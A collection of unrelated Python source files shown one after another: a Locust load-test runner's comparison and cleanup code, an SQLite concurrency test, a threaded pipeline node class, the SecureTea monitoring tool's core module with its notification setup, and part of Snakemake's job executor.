srcFilePath = os.path.join( dataDirPath, 'ltStats.html' )
if os.path.isfile( srcFilePath ):
os.rename( srcFilePath, os.path.join( dataDirPath, 'ltStats_a.html' ) )
srcFilePath = os.path.join( dataDirPath, 'locustStats.csv' )
if os.path.isfile( srcFilePath ):
os.rename( srcFilePath, os.path.join( dataDirPath, 'locustStats_a.csv' ) )
print() # a blank lne to separate the outputs from the 2 subtests
sys.stdout.flush()
# do all the steps of the second loadtest
loadTestStatsB = executeLoadtest( args.altTargetHostUrl, htmlOutFileName='ltStats_b.html' )
logger.info ( 'loadTestStatsB: %s', loadTestStatsB )
# rename an output file from the second subtest
srcFilePath = os.path.join( dataDirPath, 'locustStats.csv' )
if os.path.isfile( srcFilePath ):
os.rename( srcFilePath, os.path.join( dataDirPath, 'locustStats_b.csv' ) )
# optional code to compare stats
comparison = {}
comparison[ args.victimHostUrl ] = loadTestStats
comparison[ args.altTargetHostUrl ] = loadTestStatsB
comparisonFilePath = os.path.join( dataDirPath, 'comparison.json' )
with open( comparisonFilePath, 'w' ) as comparisonOutFile:
json.dump( comparison, comparisonOutFile, indent=2 )
# compose per-worker comparison table and save it
compDf = analyzeLtStats.compareLocustStatsByWorker( launchedJsonFilePath,
os.path.join( dataDirPath, 'locustStats_a.csv' ),
os.path.join( dataDirPath, 'locustStats_b.csv' )
)
compDf.to_json( dataDirPath+'/compWorkerTable.json', 'table', index=True )
# compose per-area comparison table and save it
compDf = analyzeLtStats.compareLocustStats( launchedJsonFilePath,
os.path.join( dataDirPath, 'locustStats_a.csv' ),
os.path.join( dataDirPath, 'locustStats_b.csv' )
)
compDf.to_json( dataDirPath+'/compAreaTable.json', 'table', index=True )
html = compDf.to_html(
classes=['sortable'], justify='left', float_format=lambda x: '%.1f' % x
)
with open( dataDirPath+'/compAreaTable.htm', 'w', encoding='utf8') as htmlOutFile:
htmlOutFile.write( html )
except KeyboardInterrupt:
logger.warning( '(ctrl-c) received, will shutdown gracefully' )
except SigTerm:
logger.warning( 'unsupported SIGTERM exception raised, may shutdown gracefully' )
if masterSpecs:
logger.info( 'shutting down locust master')
stopMaster( masterSpecs )
except Exception as exc:
logger.error( 'an exception occurred; will try to shutdown gracefully', exc_info=True )
if launchWanted:
# get instances from json file, to see which ones to terminate
launchedInstances = []
with open( launchedJsonFilePath, 'r') as jsonInFile:
try:
launchedInstances = json.load(jsonInFile) # an array
except Exception as exc:
logger.warning( 'could not load json (%s) %s', type(exc), exc )
if len( launchedInstances ):
jobId = launchedInstances[0].get('job')
if jobId:
logger.info( 'calling terminateJobInstances for job "%s"', jobId )
ncs.terminateJobInstances( args.authToken, jobId )
else:
terminateThese( args.authToken, launchedInstances )
# purgeKnownHosts works well only when known_hosts is not hashed
cmd='purgeKnownHosts.py launched.json > /dev/null'
try:
subprocess.check_call( cmd, shell=True )
except Exception as exc:
logger.error( 'purgeKnownHosts threw exception (%s) %s',type(exc), exc )
if loadTestStats and loadTestStats.get('nReqsSatisfied', 0) > 0 and testsPass( args, loadTestStats ):
rc = 0
else:
rc=1
logger.info( 'finished with rc %d', rc)
sys.exit(rc)
|
test_schema.py
|
import os
import random
import time
from tempfile import TemporaryDirectory
from threading import Thread, Barrier
from ...db.schema import SchemaDatabase
def test_db():
assert isinstance(SchemaDatabase.get_default_data_dir(), str)
with TemporaryDirectory() as _data_dir:
db = SchemaDatabase(data_dir=_data_dir)
assert db.get_data_dir() == _data_dir
assert os.path.isfile(db.get_db_file())
assert len(db.execute('SELECT * FROM Media').fetchall()) == 0
def test_db_exclusive_threads():
tx_duration = .01
free_sleep = .001
n_th = 20
n_tx = 10
# expected minimum total duration = n_tx * n_th * tx_duration
persistence = 5.
with TemporaryDirectory() as _data_dir:
SchemaDatabase(data_dir=_data_dir).execute(
'PRAGMA busy_timeout = 1') # Should have no effect.
barrier = Barrier(n_th)
def _job():
barrier.wait() # Let's spam sqlite by starting all at once
db = SchemaDatabase(data_dir=_data_dir)
barrier.wait()
for _ in range(n_tx):
poll = tx_duration * (1. + n_tx * n_th * random.random() / persistence)
db.begin_exclusive_transaction(poll=poll)
time.sleep(tx_duration)
db.commit()
time.sleep(free_sleep)
threads = [Thread(target=_job, daemon=True) for _ in range(n_th)]
for th in threads:
th.start()
for th in threads:
th.join()
if __name__ == '__main__':
import logging
logging.basicConfig(level='DEBUG',
format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',
datefmt='%m-%d %H:%M:%S')
test_db()
test_db_exclusive_threads()
|
node.py
|
import queue
from loguru import logger
import threading
import time
import enum
import collections
class Node:
"""The elementary node to build up computational graph/pipeline
"""
Pack = collections.namedtuple(
"Package", "values signal context src")
class Status(enum.Enum):
"""Operator Status codes."""
OFF = enum.auto()
ON = enum.auto()
START = enum.auto()
RUN = enum.auto()
STOP = enum.auto()
class Signal(enum.Enum):
"Operator Signal codes."
STOP = enum.auto()
WAIT = enum.auto()
DATA = enum.auto()
class Type(enum.Enum):
INPUT = enum.auto()
OUTPUT = enum.auto()
PIPE = enum.auto()
def __init__(self, op, t=Type.PIPE, name='default'):
self._name = name
self._input_buffer = queue.Queue()
self._output_buffer = queue.Queue()
self._operator = op
self._produce_thread = None
self._result_thread = None
self._status = Node.Status.ON
self._type = t
def get_name(self):
return self._name
def get_type(self):
return self._type
def toggle(self, status=Status.OFF):
self._status = Node.Status.ON
def get_op(self):
return self._operator
def start(self):
if self._status == Node.Status.OFF:
logger.warning('Please turn on the operator at first')
return
self._status = Node.Status.START
logger.info(f'{self._name} Operator is starting.')
self._produce_thread = threading.Thread(
target=self._produce, name=self._name + '-produce')
self._produce_thread.daemon = True
self._produce_thread.start()
self._result_thread = threading.Thread(
target=self._get_result, name=self._name + '-result'
)
self._result_thread.daemon = True
self._result_thread.start()
while not self._produce_thread.is_alive() or not self._result_thread.is_alive():
time.sleep(0.1)
logger.info(f'{self._name} Operator started.')
def stop(self):
logger.info(f'{self._name} Operator is stopping.')
self._operator.stop()
self._status = Node.Status.STOP
self._produce_thread.join()
self._result_thread.join()
logger.info(f'{self._name} Operator thread stopped.')
with self._input_buffer.mutex:
self._input_buffer.queue.clear()
with self._output_buffer.mutex:
self._output_buffer.queue.clear()
self._status = Node.Status.ON
logger.info(f'{self._name} Operator stopped.')
def consume(self, pack):
if self._type != Node.Type.INPUT:
if pack.signal in [Node.Signal.WAIT, Node.Signal.STOP]:
pass
else:
self._input_buffer.put(pack)
else:
logger.warning('INPUT operator does not support consume method')
def produce(self):
"""A python generator function to get the output of the operator.
Returns:
output of the operator.
"""
try:
data = self._output_buffer.get(timeout=0.1)
yield data
except queue.Empty:
yield Node.Pack(values=None, signal=Node.Signal.WAIT, context={}, src=self._name)
finally:
if self._status == Node.Status.STOP:
return
pass
def get_status(self) -> "Node.Status":
"""Get the status code of the operator.
Returns:
The status code of the operator.
"""
return self._status
def _get_result(self):
while True:
for values, context in self._operator.get_result():
if self._status == Node.Status.STOP:
break
else:
self._output_buffer.put(
Node.Pack(values=values, signal=Node.Signal.DATA,
context=context, src=self._name)
)
if self._status == Node.Status.STOP:
break
else:
pass
self._output_buffer.put(
Node.Pack(values=None, signal=Node.Signal.STOP, context={}, src=self._name))
def _produce_from_input(self):
self._operator.run()
def _produce_from_pipe(self):
src = self._name
while True:
try:
data = self._input_buffer.get(timeout=0.1)
self._operator.run(
data.values, context=data.context, src=data.src)
except queue.Empty:
pass
finally:
if self._status == Node.Status.STOP:
break
self._output_buffer.put(
Node.Pack(values=None, signal=Node.Signal.STOP, context={}, src=src))
def _produce_from_output(self):
while True:
try:
data = self._input_buffer.get(timeout=0.1)
self._operator.run(
data.values, context=data.context, src=data.src)
except queue.Empty:
pass
finally:
if self._status == Node.Status.STOP:
break
self._output_buffer.put(
Node.Pack(values=None, signal=Node.Signal.STOP, context={}, src=self._name))
def _produce(self):
logger.info(f'{self._name} Operator thread started.')
if self._type == Node.Type.INPUT:
self._produce_from_input()
elif self._type == Node.Type.OUTPUT:
self._produce_from_output()
elif self._type == Node.Type.PIPE:
self._produce_from_pipe()
else:
logger.error(f'Unknown type for the operator {self._name}')
logger.info(f'{self._name} Operator thread is stopping.')
|
core.py
|
# -*- coding: utf-8 -*-
u"""SecureTea.
Project:
╔═╗┌─┐┌─┐┬ ┬┬─┐┌─┐╔╦╗┌─┐┌─┐
╚═╗├┤ │ │ │├┬┘├┤ ║ ├┤ ├─┤
╚═╝└─┘└─┘└─┘┴└─└─┘ ╩ └─┘┴ ┴
Version: 1.1
Module: SecureTea
"""
# To share mouse gestures
import struct
import sys
import time
import threading
from securetea import configurations
from securetea import logger
from securetea.lib.notifs import secureTeaTwitter
from securetea.lib.notifs.secureTeaTelegram import SecureTeaTelegram
from securetea.lib.notifs import secureTeaSlack
from securetea.lib.notifs.aws import secureTeaAwsSES
from securetea.lib.firewall import secureTeaFirewall
from securetea.lib.notifs import secureTeaTwilio
from securetea.lib.notifs import secureTeaGmail
from securetea.args.arguments import get_args
from securetea.args.args_helper import ArgsHelper
from securetea.lib.firewall.utils import setup_logger
from securetea.lib.security_header import secureTeaHeaders
from securetea.lib.ids import secureTeaIDS
from securetea.lib.log_monitor.system_log import engine
from securetea.lib.log_monitor.server_log.secureTeaServerLog import SecureTeaServerLog
from securetea.lib.auto_server_patcher.secureTeaServerPatcher import SecureTeaAutoServerPatcher
from securetea.lib.web_deface.secureTeaWebDeface import WebDeface
from securetea.lib.antivirus.secureTeaAntiVirus import SecureTeaAntiVirus
from securetea.lib.iot import iot_checker
from securetea.modes import server_mode
from securetea.modes import system_mode
from securetea.modes import iot_mode
pynput_status = True
try:
from pynput import mouse
except Exception as e:
pynput_status = False
class SecureTea(object):
"""SecureTea Class."""
alert_count = 1
def __init__(self):
"""Init SecureTea params.
Args:
None
Raises:
None
Returns:
None
Working:
Collects the arguments passed and calls the respected module accordingly
for parsing the arguments. Further, creates object for the demanded
notification medium and starts SecureTea.
"""
modulename = 'Core'
self.cred = {}
args = get_args()
argsHelper = ArgsHelper(args)
args_dict = argsHelper.check_args()
credentials = configurations.SecureTeaConf()
self.cred = args_dict['cred']
self.cred_provided = args_dict['cred_provided']
self.twitter_provided = args_dict['twitter_provided']
self.telegram_provided = args_dict['telegram_provided']
self.twilio_provided = args_dict['twilio_provided']
self.slack_provided = args_dict['slack_provided']
self.aws_ses_provided = args_dict['aws_ses_provided']
self.gmail_provided = args_dict['gmail_provided']
self.firewall_provided = args_dict['firewall_provided']
self.insecure_headers_provided = args_dict['insecure_headers_provided']
self.ids_provided = args_dict['ids_provided']
self.system_log_provided = args_dict['system_log_provided']
self.server_log_provided = args_dict['server_log_provided']
self.auto_server_patcher_provided = args_dict['auto_server_patcher_provided']
self.web_deface_provided = args_dict['web_deface_provided']
self.antivirus_provided = args_dict['antivirus_provided']
self.iot_checker_provided = args_dict['iot_checker_provided']
self.server_mode = args_dict["server_mode"]
self.system_mode = args_dict["system_mode"]
self.iot_mode = args_dict["iot_mode"]
# Initialize logger
self.logger = logger.SecureTeaLogger(
modulename,
self.cred['debug']
)
# Setup logger for utils
setup_logger(debug=self.cred['debug'])
if self.cred_provided:
credentials.save_creds(self.cred)
else:
self.cred = credentials.get_creds(args)
try:
if self.cred['twitter']:
self.twitter_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Twitter configuration parameter not set.",
logtype="error"
)
try:
if self.cred['telegram']:
self.telegram_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Telegram configuration parameter not set.",
logtype="error"
)
try:
if self.cred['twilio']:
self.twilio_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Twilio configuration parameter not set.",
logtype="error"
)
try:
if self.cred['slack']:
self.slack_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Slack configuration parameter not set.",
logtype="error"
)
try:
if self.cred['aws_ses']:
self.aws_ses_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"AWS SES configuration parameter not set.",
logtype="error"
)
try:
if self.cred['gmail']:
self.gmail_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Gmail configuraton parameter not set.",
logtype="error"
)
try:
if self.cred['firewall']:
self.firewall_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Firewall configuraton parameter not set.",
logtype="error"
)
try:
if self.cred['insecure_headers']:
self.insecure_headers_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Insecure headers parameter not set.",
logtype="error"
)
try:
if self.cred['ids']:
self.ids_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Intrusion Detection System (IDS) not set.",
logtype="error"
)
try:
if self.cred['server_log']:
self.server_log_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Server Log configuraton parameter not set.",
logtype="error"
)
try:
if self.cred['auto_server_patcher']:
self.auto_server_patcher_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Auto server patcher configuraton not set.",
logtype="error"
)
try:
if self.cred['web-deface']:
self.web_deface_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Web Deface Detection configuraton not set.",
logtype="eror"
)
try:
if self.cred['antivirus']:
self.antivirus_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"AntiVirus configuraton not set.",
logtype="error"
)
try:
if self.cred['iot-check']:
self.iot_checker_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"IoT Checker configuraton not set.",
logtype="error"
)
if not self.cred:
self.logger.log(
"Configuration not found.",
logtype="error"
)
sys.exit(0)
if not self.cred_provided:
self.logger.log(
"None of the notifications configured. Exiting...",
logtype="error"
)
sys.exit(0)
self.logger.log(
"Intrusion system Initializing",
logtype="info"
)
# Initialize modes at first (Server, System, IoT)
# Check for Server mode
if self.server_mode:
self.logger.log(
"Starting SecureTea in server mode",
logtype="info"
)
# Initialize Server Mode object
self.server_mode_obj = server_mode.ServerMode(cred=self.cred, debug=self.cred["debug"])
self.server_mode_obj.start_server_mode()
# Avoid multiple process of the objects created by the server mode, set their credentials to False
self.firewall_provided = False
self.server_log_provided = False
self.antivirus_provided = False
self.web_deface_provided = False
self.system_log_provided = False
self.auto_server_patcher_provided = False
self.ids_provided = False
# Check for System mode
if self.system_mode:
self.logger.log(
"Starting SecureTea in system mode",
logtype="info"
)
# Initialize System Mode object
self.system_mode_obj = system_mode.SystemMode(cred=self.cred, debug=self.cred["debug"])
self.system_mode_obj.start_system_mode()
# Avoid multiple process of the objects created by the system mode, set their credentials to False
self.firewall_provided = False
self.antivirus_provided = False
self.system_log_provided = False
self.ids_provided = False
# Check for IoT mode
if self.iot_mode:
self.logger.log(
"Starting SecureTea in IoT mode",
logtype="info"
)
# Initialize IoT Mode object
self.iot_mode_obj = iot_mode.IoTMode(cred=self.cred, debug=self.cred["debug"])
self.iot_mode_obj.start_iot_mode()
# Avoid multiple process of the objects created by the IoT mode, set their credentials to False
self.firewall_provided = False
self.ids_provided = False
self.iot_checker_provided = False
if self.twitter_provided:
self.twitter = secureTeaTwitter.SecureTeaTwitter(
self.cred['twitter'],
self.cred['debug']
)
if not self.twitter.enabled:
self.logger.log(
"Twitter notification not configured properly.",
logtype="error"
)
else:
self.twitter.notify("Welcome to SecureTea..!! Initializing System")
if self.telegram_provided:
self.telegram = SecureTeaTelegram(
self.cred['telegram'],
self.cred['debug']
)
if not self.telegram.enabled:
self.logger.log(
"Telegram notification not configured properly.",
logtype="error"
)
else:
self.telegram.notify("Initializing Intrusion System")
if self.twilio_provided:
self.twilio = secureTeaTwilio.SecureTeaTwilio(
self.cred['twilio'],
self.cred['debug']
)
if not self.twilio.enabled:
self.logger.log(
"Twilio not configured properly.",
logtype="error"
)
else:
self.twilio.notify("Welcome to SecureTea..!! Initializing System")
if self.slack_provided:
self.slack = secureTeaSlack.SecureTeaSlack(
self.cred['slack'],
self.cred['debug']
)
if not self.slack.enabled:
self.logger.log(
"Slack not configured properly.",
logtype="error"
)
else:
self.slack.notify("Welcome to SecureTea..!! Initializing System")
if self.aws_ses_provided:
self.aws_ses = secureTeaAwsSES.SecureTeaAwsSES(
self.cred['aws_ses'],
self.cred['debug']
)
if not self.aws_ses.enabled:
self.logger.log(
"AWS SES not configured properly.",
logtype="error"
)
else:
self.aws_ses.notify("Welcome to SecureTea..!! Initializing System")
if self.gmail_provided:
self.gmail_obj = secureTeaGmail.SecureTeaGmail(
cred=self.cred['gmail'],
debug=self.cred['debug']
)
if not self.gmail_obj.enabled:
self.logger.log(
"Gmail not configured properly.",
logtype="error"
)
else:
self.gmail_obj.notify("Welcome to SecureTea..!! Initializing System")
if self.firewall_provided:
try:
if self.cred['firewall']:
firewallObj = secureTeaFirewall.SecureTeaFirewall(cred=self.cred,
debug=self.cred['debug'])
firewallObj.start_firewall()
except KeyError:
self.logger.log(
"Firewall configuration parameter not configured.",
logtype="error"
)
if self.insecure_headers_provided:
try:
if self.cred['insecure_headers']:
url = self.cred['insecure_headers']['url']
insecure_headers_obj = secureTeaHeaders.SecureTeaHeaders(url=url,
debug=self.cred['debug'])
insecure_headers_obj.analyze()
except KeyError:
self.logger.log(
"Insecure headers parameter not configured.",
logtype="error"
)
if self.ids_provided:
try:
if self.cred['ids']:
ids_obj = secureTeaIDS.SecureTeaIDS(cred=self.cred['ids'],
debug=self.cred['debug'])
ids_obj.start_ids()
except KeyError:
self.logger.log(
"Intrusion Detection System (IDS) parameter not configured.",
logtype="error"
)
if self.system_log_provided:
try:
sys_obj = engine.SystemLogEngine(debug=self.cred['debug'])
sys_obj.run()
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.server_log_provided:
server_cred = self.cred['server_log']
try:
server_obj = SecureTeaServerLog(debug=self.cred['debug'],
log_type=server_cred['log-type'],
log_file=server_cred['log-file'],
window=server_cred['window'],
ip_list=server_cred['ip-list'],
status_code=server_cred['status-code'])
server_obj.run()
except KeyError:
self.logger.log(
"Server Log parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.auto_server_patcher_provided:
auto_server_patcher_cred = self.cred['auto_server_patcher']
try:
patcher_obj = SecureTeaAutoServerPatcher(debug=self.cred['debug'],
cred=auto_server_patcher_cred)
patcher_obj.start()
except KeyError:
self.logger.log(
"Auto Server Patcher parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.web_deface_provided:
web_deface = self.cred['web_deface']
try:
web_deface_obj = WebDeface(debug=self.cred['debug'],
path=web_deface['path'],
server_name=web_deface['server-name'])
web_deface_obj.start()
except KeyError:
self.logger.log(
"Web Deface Detection parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.antivirus_provided:
antivirus = self.cred['antivirus']
try:
antivirus_obj = SecureTeaAntiVirus(debug=self.cred['debug'], cred=antivirus)
antivirus_obj.start()
except KeyError:
self.logger.log(
"AntiVirus parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.iot_checker_provided:
try:
iot_checker_obj = iot_checker.IoTChecker(debug=self.cred['debug'],
api_key=self.cred['iot-check']['shodan-api-key'],
ip=self.cred['iot-check']['ip'])
iot_checker_obj.check_shodan_range()
except KeyError:
self.logger.log(
"IoT checker parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
def send_notif(self, msg):
"""Send notification through
the available mediums.
Args:
msg (str): Message to send
Raises:
None
Returns:
None
"""
# Send a warning message via twitter account
if self.twitter_provided:
self.twitter.notify(msg)
# Send a warning message via telegram bot
if self.telegram_provided:
self.telegram.notify(msg)
# Send a warning message via twilio account
if self.twilio_provided:
self.twilio.notify(msg)
# Send a warning message via slack bot app
if self.slack_provided:
self.slack.notify(msg)
# Send a warning message via aws ses bot3 app
if self.aws_ses_provided:
self.aws_ses.notify(msg)
# Send a warning message via Gmail
if self.gmail_provided:
self.gmail_obj.notify(msg)
def on_move(self, x, y):
"""
Log warning on terminal & send notification
on mouse movement.
Args:
x (TYPE): X - mouse position
y (TYPE): y - mouse position
Raises:
None
Returns:
bool (False): Stop the listener
"""
self.logger.log('Pointer moved to {0}'.format((x, y)))
msg = '(' + str(self.alert_count) + \
') : Someone has accessed your computer'
# Shows the warning msg on the console
self.logger.log(msg, logtype="warning")
# Send message notification to available platforms
self.send_notif(msg)
# Update counter for the next move
self.alert_count += 1
self.logger.log("The program will sleep for 10 seconds")
time.sleep(10)
# Ready to monitor the next move
self.logger.log("Ready to monitor further movement .. !!")
# Stop the listener
return False
@staticmethod
def get_mouse_event():
"""Get mouse event.
Args:
None
Raises:
None
Returns:
x (int): X - mouse position
y (int): y - mouse position
"""
with open("/dev/input/mice", "rb") as fh:
buf = fh.read(3)
x, y = struct.unpack("bb", buf[1:])
return x, y
def get_by_mice(self):
"""Detect intrusion by watching mouse coordinates.
Args:
None
Raises:
None
Returns:
None
"""
posx = 0
posy = 0
while(1):
x, y = self.get_mouse_event()
posx = posx + x
posy = posy + y
if (posx > 100 or posy > 100 or posx < -100 or posy < -100):
posx = 0
posy = 0
self.on_move(posx, posy)
def on_user_update(self):
"""
Send updates regarding the users currently logged in to the system
to various platforms.
"""
msg = self.userLogger.log()
if msg == "USERS UPDATES\n":
self.logger.log("NO NEW USERS DETECTED")
return
# Shows the warning msg on the console
self.logger.log(msg, logtype="warning")
# Send message notification to available platforms
self.send_notif(msg)
return
def run_mouse_notifs(self):
"""Run methods for notification using mice activity"""
time.sleep(10)
try:
if not pynput_status:
self.get_by_mice()
else:
while 1:
# Starting mouse event listner
with mouse.Listener(on_move=self.on_move) as listener:
listener.join()
except Exception as e:
self.logger.log(
"Something went wrong: " + str(e) + " End of program",
logtype="error"
)
except KeyboardInterrupt as e:
self.logger.log(
"You pressed Ctrl+C!, Bye")
exit()
def run_user_notifs(self):
"""Run methods for notification of users added or removed"""
try:
from securetea import users
self.userLogger = users.SecureTeaUserLogger(self.cred['debug'])
if not pynput_status:
self.get_by_mice()
else:
while 1:
# Starting user notifs
self.on_user_update()
time.sleep(10)
except Exception as e:
self.logger.log(
"Something went wrong: " + str(e) + " End of program",
logtype="error"
)
except KeyboardInterrupt as e:
self.logger.log(
"You pressed Ctrl+C!, Bye")
exit()
def run(self):
"""
Track mouse activity & SSH users on
different threads.
Args:
None
Raises:
None
Returns:
None
"""
try:
t1 = threading.Thread(target=self.run_mouse_notifs)
t2 = threading.Thread(target=self.run_user_notifs)
t2.start()
t1.start()
except Exception as e:
self.logger.log(
"Something went wrong: " + str(e) + " End of program",
logtype="error"
)
except KeyboardInterrupt as e:
self.logger.log(
"You pressed Ctrl+C!, Bye")
exit()
|
__init__.py
|
__author__ = "Johannes Köster"
__copyright__ = "Copyright 2022, Johannes Köster"
__email__ = "johannes.koester@uni-due.de"
__license__ = "MIT"
import os
import sys
import contextlib
import time
import datetime
import json
import textwrap
import stat
import shutil
import shlex
import threading
import concurrent.futures
import subprocess
import signal
import tempfile
import threading
from functools import partial
from itertools import chain
from collections import namedtuple
from snakemake.io import _IOFile
import random
import base64
import uuid
import re
import math
from snakemake.jobs import Job
from snakemake.shell import shell
from snakemake.logging import logger
from snakemake.stats import Stats
from snakemake.utils import format, Unformattable, makedirs
from snakemake.io import get_wildcard_names, Wildcards
from snakemake.exceptions import print_exception, get_exception_origin
from snakemake.exceptions import format_error, RuleException, log_verbose_traceback
from snakemake.exceptions import (
ProtectedOutputException,
WorkflowError,
ImproperShadowException,
SpawnedJobError,
CacheMissException,
)
from snakemake.common import Mode, __version__, get_container_image, get_uuid
# TODO move each executor into a separate submodule
def sleep():
# do not sleep on CI. In that case we just want to quickly test everything.
if os.environ.get("CI") != "true":
time.sleep(10)
class AbstractExecutor:
def __init__(
self,
workflow,
dag,
printreason=False,
quiet=False,
printshellcmds=False,
printthreads=True,
keepincomplete=False,
keepmetadata=True,
):
self.workflow = workflow
self.dag = dag
self.quiet = quiet
self.printreason = printreason
self.printshellcmds = printshellcmds
self.printthreads = printthreads
self.latency_wait = workflow.latency_wait
self.keepincomplete = keepincomplete
self.keepmetadata = keepmetadata
def get_default_remote_provider_args(self):
if self.workflow.default_remote_provider:
return (
" --default-remote-provider {} " "--default-remote-prefix {} "
).format(
self.workflow.default_remote_provider.__module__.split(".")[-1],
self.workflow.default_remote_prefix,
)
return ""
def _format_key_value_args(self, flag, kwargs):
if kwargs:
return " {} {} ".format(
flag,
" ".join("{}={}".format(key, value) for key, value in kwargs.items()),
)
return ""
def get_set_threads_args(self):
return self._format_key_value_args(
"--set-threads", self.workflow.overwrite_threads
)
def get_set_resources_args(self):
if self.workflow.overwrite_resources:
return " --set-resources {} ".format(
" ".join(
"{}:{}={}".format(rule, name, value)
for rule, res in self.workflow.overwrite_resources.items()
for name, value in res.items()
)
)
return ""
def get_set_scatter_args(self):
return self._format_key_value_args(
"--set-scatter", self.workflow.overwrite_scatter
)
def get_default_resources_args(self, default_resources=None):
if default_resources is None:
default_resources = self.workflow.default_resources
if default_resources:
def fmt(res):
if isinstance(res, str):
res = res.replace('"', r"\"")
return '"{}"'.format(res)
args = " --default-resources {} ".format(
" ".join(map(fmt, self.workflow.default_resources.args))
)
return args
return ""
def get_local_groupid_arg(self):
return f" --local-groupid {self.workflow.local_groupid} "
def get_behavior_args(self):
if self.workflow.conda_not_block_search_path_envvars:
return " --conda-not-block-search-path-envvars "
return ""
def run_jobs(self, jobs, callback=None, submit_callback=None, error_callback=None):
"""Run a list of jobs that is ready at a given point in time.
By default, this method just runs each job individually.
This method can be overwritten to submit many jobs in a more efficient way than one-by-one.
Note that in any case, for each job, the callback functions have to be called individually!
"""
for job in jobs:
self.run(
job,
callback=callback,
submit_callback=submit_callback,
error_callback=error_callback,
)
def run(self, job, callback=None, submit_callback=None, error_callback=None):
"""Run a specific job or group job."""
self._run(job)
callback(job)
def shutdown(self):
pass
def cancel(self):
pass
def _run(self, job):
job.check_protected_output()
self.printjob(job)
def rule_prefix(self, job):
return "local " if job.is_local else ""
def printjob(self, job):
job.log_info(skip_dynamic=True)
def print_job_error(self, job, msg=None, **kwargs):
job.log_error(msg, **kwargs)
def handle_job_success(self, job):
pass
def handle_job_error(self, job):
pass
class DryrunExecutor(AbstractExecutor):
def printjob(self, job):
super().printjob(job)
if job.is_group():
for j in job.jobs:
self.printcache(j)
else:
self.printcache(job)
def printcache(self, job):
if self.workflow.is_cached_rule(job.rule):
if self.workflow.output_file_cache.exists(job):
logger.info(
"Output file {} will be obtained from global between-workflow cache.".format(
job.output[0]
)
)
else:
logger.info(
"Output file {} will be written to global between-workflow cache.".format(
job.output[0]
)
)
class RealExecutor(AbstractExecutor):
def __init__(
self,
workflow,
dag,
printreason=False,
quiet=False,
printshellcmds=False,
assume_shared_fs=True,
keepincomplete=False,
keepmetadata=False,
):
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
self.assume_shared_fs = assume_shared_fs
self.stats = Stats()
self.snakefile = workflow.main_snakefile
def register_job(self, job):
job.register()
def _run(self, job, callback=None, error_callback=None):
super()._run(job)
self.stats.report_job_start(job)
try:
self.register_job(job)
except IOError as e:
logger.info(
"Failed to set marker file for job started ({}). "
"Snakemake will work, but cannot ensure that output files "
"are complete in case of a kill signal or power loss. "
"Please ensure write permissions for the "
"directory {}".format(e, self.workflow.persistence.path)
)
def handle_job_success(
self,
job,
upload_remote=True,
handle_log=True,
handle_touch=True,
ignore_missing_output=False,
):
job.postprocess(
upload_remote=upload_remote,
handle_log=handle_log,
handle_touch=handle_touch,
ignore_missing_output=ignore_missing_output,
latency_wait=self.latency_wait,
assume_shared_fs=self.assume_shared_fs,
keep_metadata=self.keepmetadata,
)
self.stats.report_job_end(job)
def handle_job_error(self, job, upload_remote=True):
job.postprocess(
error=True,
assume_shared_fs=self.assume_shared_fs,
latency_wait=self.latency_wait,
)
def get_additional_args(self):
"""Return a string to add to self.exec_job that includes additional
arguments from the command line. This is currently used in the
ClusterExecutor and CPUExecutor, as both were using the same
code. Both have base class of the RealExecutor.
"""
additional = ""
if not self.workflow.cleanup_scripts:
additional += " --skip-script-cleanup "
if self.workflow.shadow_prefix:
additional += " --shadow-prefix {} ".format(self.workflow.shadow_prefix)
if self.workflow.use_conda:
additional += " --use-conda "
if self.workflow.conda_frontend:
additional += " --conda-frontend {} ".format(
self.workflow.conda_frontend
)
if self.workflow.conda_prefix:
additional += " --conda-prefix {} ".format(self.workflow.conda_prefix)
if self.workflow.conda_base_path and self.assume_shared_fs:
additional += " --conda-base-path {} ".format(
self.workflow.conda_base_path
)
if self.workflow.use_singularity:
additional += " --use-singularity "
if self.workflow.singularity_prefix:
additional += " --singularity-prefix {} ".format(
self.workflow.singularity_prefix
)
if self.workflow.singularity_args:
additional += ' --singularity-args "{}"'.format(
self.workflow.singularity_args
)
if not self.workflow.execute_subworkflows:
additional += " --no-subworkflows "
if self.workflow.max_threads is not None:
additional += " --max-threads {} ".format(self.workflow.max_threads)
additional += self.get_set_resources_args()
additional += self.get_set_scatter_args()
additional += self.get_set_threads_args()
additional += self.get_behavior_args()
if self.workflow.use_env_modules:
additional += " --use-envmodules "
if not self.keepmetadata:
additional += " --drop-metadata "
return additional
def format_job_pattern(self, pattern, job=None, **kwargs):
overwrite_workdir = []
if self.workflow.overwrite_workdir:
overwrite_workdir.extend(("--directory", self.workflow.overwrite_workdir))
overwrite_config = []
if self.workflow.overwrite_configfiles:
# add each of the overwriting configfiles in the original order
if self.workflow.overwrite_configfiles:
overwrite_config.append("--configfiles")
overwrite_config.extend(self.workflow.overwrite_configfiles)
if self.workflow.config_args:
overwrite_config.append("--config")
overwrite_config.extend(self.workflow.config_args)
